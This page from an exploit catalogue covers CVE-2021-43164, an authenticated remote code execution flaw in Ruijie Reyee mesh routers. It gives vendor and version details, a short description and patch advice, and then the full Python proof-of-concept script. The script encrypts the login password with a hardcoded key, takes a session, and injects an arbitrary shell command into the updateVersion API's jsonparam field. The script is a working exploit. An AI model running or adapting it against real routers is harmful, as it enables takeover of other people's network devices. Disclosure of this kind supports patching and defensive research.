header-logo
Suggest Exploit
vendor:
Reyee Mesh Router
by:
Minh Khoa of VSEC
8.8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Reyee Mesh Router
Affected Version From: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35
Affected Version To: EW_3.0(1)B11P55
Patch Exists: YES
Related CWE: CVE-2021-43164
CPE: h:ruijienetworks:reyee_mesh_router
Metasploit:
Other Scripts:
Platforms Tested: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
2021

Ruijie Reyee Mesh Router – Remote Code Execution (RCE) (Authenticated)

This exploit allows an authenticated user to execute arbitrary code on the vulnerable Ruijie Reyee Mesh Router. The vulnerability exists in the updateVersion API endpoint, which allows an attacker to inject arbitrary commands into the jsonparam parameter. The exploit requires the attacker to have valid credentials for the router.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their routers to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164

#!/usr/bin/python3

import os
import sys
import time
import requests
import json

def enc(PASS):
    key   = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()

try:
    TARGET  = sys.argv[1]
    USER    = sys.argv[2]
    PASS    = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")
    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
    sys.exit(1)

endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False
            }
        }

r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]

endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)
            }
        }

r = requests.post(endpoint, json=payload)
print(r.text)

Navigation

Suggest Exploit

Services By CQR